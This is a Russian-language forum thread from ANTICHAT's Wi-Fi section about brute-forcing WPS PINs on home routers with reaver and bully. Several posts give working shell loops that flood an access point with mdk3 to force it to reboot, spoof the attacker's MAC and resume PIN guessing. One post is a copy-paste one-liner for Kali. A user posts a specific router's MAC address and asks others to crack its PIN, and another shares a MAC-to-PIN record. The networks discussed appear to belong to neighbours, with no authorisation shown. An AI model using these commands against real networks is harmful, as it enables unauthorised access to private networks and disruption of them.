HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.01.2014, 12:41
Stranger@
Познающий
Регистрация: 10.07.2012
Сообщений: 73
Провел на форуме:
16743

Репутация: 0
По умолчанию

Цитата:
Сообщение от Vikhedgehog  

На точке которая в нашем дворе не прокатило. После нескольких перезагрузок продолжает показывать wps, в винде предлагается нажать wps кнопку а вот ривер не идет, аиреплай говорит "Association denied (code 20). Вы с таким не встречались?

У меня такое было с Tp-linkom, тоже не мог понять почему не проходит ассоциация в reaver, пока не разобрался, клиент отключает пин-код роутера, а ставит произвольный свой, reaver показывает наличие открытого WPS, а асосцииацию невозможно произвести, ни с помощью reaver, ни с aireplay-ng.

 
Ответить с цитированием

  #2  
Старый 21.01.2014, 15:40
Vikhedgehog
Постоянный
Регистрация: 24.07.2013
Сообщений: 362
Провел на форуме:
123149

Репутация: 19
По умолчанию

Цитата:
Сообщение от Stranger@  

У меня такое было с Tp-linkom, тоже не мог понять почему не проходит ассоциация в reaver, пока не разобрался, клиент отключает пин-код роутера, а ставит произвольный свой, reaver показывает наличие открытого WPS, а асосцииацию невозможно произвести, ни с помощью reaver, ни с aireplay-ng.

Не совсем понял, чтоб wps отключился нужно чтоб вмешивался хозяин точки? И можно ли как-то вычислить новый PIN и потом запустить ривер с мак адресом уже подключенного компьютера чтоб получить пароль?
 
Ответить с цитированием

  #3  
Старый 21.01.2014, 17:21
Klaatu
Member
Регистрация: 21.11.2012
Сообщений: 554
Провел на форуме:
178124

Репутация: 8
По умолчанию

Цитата:
Сообщение от Vikhedgehog  

который во время перезагрузки точки заодно меняет мак адрес адаптера на рандомный

Код:
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
 
Ответить с цитированием

  #4  
Старый 21.01.2014, 18:12
paulo
Участник форума
Регистрация: 06.12.2011
Сообщений: 270
Провел на форуме:
82091

Репутация: 1
По умолчанию

Цитата:
Сообщение от Klaatu  

Код:
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
Расскажите пожалуйста "на пальцах",что куда вводить. столкнулась с такой проблемой,что через 10 пинов точка уходит в лок ,обычно на сутки,но с помощью команды mdk3 ,я брала в пример Вашу,точка перезагружается,и снова позволяет пробить 10 пинов. как можно это сделать в автоматическом режиме? точнее-что куда прописать,и пользуюсь я ривером,не bully.
 
Ответить с цитированием

  #5  
Старый 21.01.2014, 19:04
Vikhedgehog
Постоянный
Регистрация: 24.07.2013
Сообщений: 362
Провел на форуме:
123149

Репутация: 19
По умолчанию

Цитата:
Сообщение от Klaatu  

Код:
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
Спасибо)

Цитата:
Сообщение от Stranger@  

У меня такое было с Tp-linkom, тоже не мог понять почему не проходит ассоциация в reaver, пока не разобрался, клиент отключает пин-код роутера, а ставит произвольный свой, reaver показывает наличие открытого WPS, а асосцииацию невозможно произвести, ни с помощью reaver, ни с aireplay-ng.


Я когда попробовал сделать также в настройках (TL-WR841N) ассоциация продолжала работать, отключить пин код маршрутизатора = просто залочило wps. Так что видимо код 20 это что то другое. Или может прошивка какая-то особенная, не знаю.
 
Ответить с цитированием

  #6  
Старый 21.01.2014, 19:42
Klaatu
Member
Регистрация: 21.11.2012
Сообщений: 554
Провел на форуме:
178124

Репутация: 8
По умолчанию

Цитата:
Сообщение от paulo  

Расскажите пожалуйста "на пальцах",что куда вводить.

в командной строке в kali linux копируешь и вставляешь одной строкой:

Код:
while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
 
Ответить с цитированием

  #7  
Старый 21.01.2014, 21:19
ohoo
New Member
Регистрация: 26.12.2013
Сообщений: 42
Провел на форуме:
16623

Репутация: 0
По умолчанию

Цитата:
Сообщение от Klaatu  

в командной строке в kali linux копируешь и вставляешь одной строкой:

Код:
while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
а как в бактраке запустить этот скрипт
 
Ответить с цитированием

  #8  
Старый 21.01.2014, 23:39
Mr1perfeckt
Banned
Регистрация: 03.03.2013
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

D8:EB:97:1F:3F:11 TRENDnet651

Кто поможет подобрать пин?
 
Ответить с цитированием

  #9  
Старый 22.01.2014, 00:25
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от Mr1perfeckt  

D8:EB:97:1F:3F:11 TRENDnet651

Кто поможет подобрать пин?

Недавно пробовал подобрать пин к точке от акадо, по маку тоже начинающейся с D8:EB:97. Так и не подобрал. Перебрало все варианты первой части (2 раза пробовал), видимо возможность заблокирована из настроек роутера.

Да и по этому маку у меня очень маленькая статистика, всего одна запись в базе

D8:EB:97:14:12:CD | 31850483
 
Ответить с цитированием

  #10  
Старый 22.01.2014, 00:36
4pips
Elder - Старейшина
Регистрация: 15.09.2013
Сообщений: 529
Провел на форуме:
124918

Репутация: 40
По умолчанию

Из моих наблюдений, на Тренднет нужно ходить с булли: плохо они риверу отвечают и даже были случаи (специально проверял) риверу не отдают PSK, а булли отдают.

Я только одну точку встречал с D8:EB:97 и тоже именно с булли открыл, причем без заморочек. Но провайдер был не акадо.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.